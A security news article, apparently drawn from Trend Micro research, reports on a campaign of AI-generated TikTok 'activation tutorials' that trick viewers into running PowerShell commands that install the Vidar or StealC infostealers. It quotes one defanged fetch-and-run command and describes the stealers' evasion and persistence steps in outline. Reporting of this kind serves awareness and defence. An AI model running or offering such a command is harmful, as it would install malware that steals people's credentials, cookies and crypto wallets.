Cybercriminals have evolved their malware distribution tactics by weaponizing TikTok’s algorithm and exploiting user trust through sophisticated AI-generated videos that masquerade as legitimate software activation tutorials.
Cybercriminals now exploit TikTok’s algorithm with AI-generated fake tutorials to distribute malware through deceptive software activation guides.
Trend Micro researchers identified this campaign as a significant shift from traditional browser-based malware delivery methods, with threat actors creating deceptively professional content that mimics authentic activation walkthroughs for popular applications including Windows, Microsoft Office, CapCut, and Spotify. The malicious videos were hosted across multiple accounts, including @gitallowed and @sysglow.wow, which have since been removed from the platform.
The campaign employs “ClickFix” social engineering tactics, utilizing fake error messages and CAPTCHA prompts to convince users to execute dangerous PowerShell commands. Victims are instructed to open PowerShell and run specific commands such as “iex (irm hxxps://allaivo[.]me/spotify),” which initiates a complex infection chain designed to deploy either Vidar or StealC information stealers onto their systems.
Once executed, the malicious PowerShell scripts create hidden directories within APPDATA and LOCALAPPDATA folders, afterward excluding these locations from Windows Defender scans to evade detection. The malware establishes persistence by modifying registry keys to automatically execute scripts during system startup, and at the same time scrubbing forensic footprints to delay identification by security solutions. Users who suspect infection should immediately disconnect compromised devices from their networks to prevent further unauthorized access.
Both Vidar and StealC possess extensive data theft capabilities, targeting browser credentials, cryptocurrency wallets, and session tokens to facilitate account takeovers. Vidar specifically captures desktop screenshots while collecting login credentials, cookies, credit card information, and crypto wallet data from infected devices.
The malware’s command-and-control infrastructure utilizes legitimate platforms including Telegram channels and Steam Community profiles to conceal malicious communications through Dead Drop Resolvers that mask actual IP addresses. These threats have expanded beyond traditional piracy sites to target gaming platforms and AI tools, making detection increasingly complex for law enforcement agencies.
This TikTok campaign represents part of a broader trend where cybercriminals exploit AI-generated content across social media platforms. Similar operations have been observed on Facebook, where threat actors promote fake AI-powered tools and cracked software through well-designed posts that eventually distribute identical malware families through fraudulent download portals.
Security experts recommend extreme caution when encountering social media content requesting PowerShell command execution, emphasizing that legitimate software activation procedures never require users to run script commands from untrusted sources or social media platforms.
